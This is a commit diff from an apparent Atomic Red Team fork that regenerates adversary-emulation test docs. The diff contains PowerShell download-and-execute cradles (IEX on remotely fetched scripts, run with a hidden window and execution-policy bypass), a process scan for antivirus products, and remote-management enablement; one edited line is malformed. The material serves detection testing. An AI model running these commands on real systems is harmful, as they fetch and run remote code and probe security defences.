security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=PowerShell-Executor.Command-Properties

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-09-05 15:35:37 +00:00
parent b512869c36
commit c03d202bd5
6 changed files with 10 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1028/T1028.md
+1 -1
View File
@@ -37,7 +37,7 @@ Powershell Enable WinRM
#### Run it with `powershell`!
```
powershell Enable-PSRemoting -Force
Enable-PSRemoting -Force
```
<br/>
<br/>
atomics/T1033/T1033.md
+1 -1
View File
@@ -40,7 +40,7 @@ Identify System owner or users on an endpoint
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | strong | computer1|
| computer_name | Name of remote computer | string | computer1|
#### Run it with `command_prompt`!
```
atomics/T1063/T1063.md
+4 -4
View File
@@ -57,10 +57,10 @@ Methods to identify Security Software on an endpoint
#### Run it with `powershell`!
```
powershell.exe get-process | ?{$_.Description -like "*virus*"}
powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
powershell.exe get-process | ?{$_.Description -like "*defender*"}
powershell.exe get-process | ?{$_.Description -like "*cylance*"}
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}
```
<br/>
<br/>
atomics/T1074/T1074.md
+1 -1
View File
@@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file
#### Run it with `powershell`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
```
<br/>
atomics/T1086/T1086.md
+2 -2
View File
@@ -167,7 +167,7 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Run it with `powershell`!
```
powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -184,7 +184,7 @@ Powershell xml download request
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `powershell`!
#### Run it with `command_prompt`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
atomics/T1124/T1124.md
+1 -1
View File
@@ -48,6 +48,6 @@ Identify the system time via PowerShell
#### Run it with `powershell`!
```
powershell.exe Get-Date
Get-Date
```
<br/>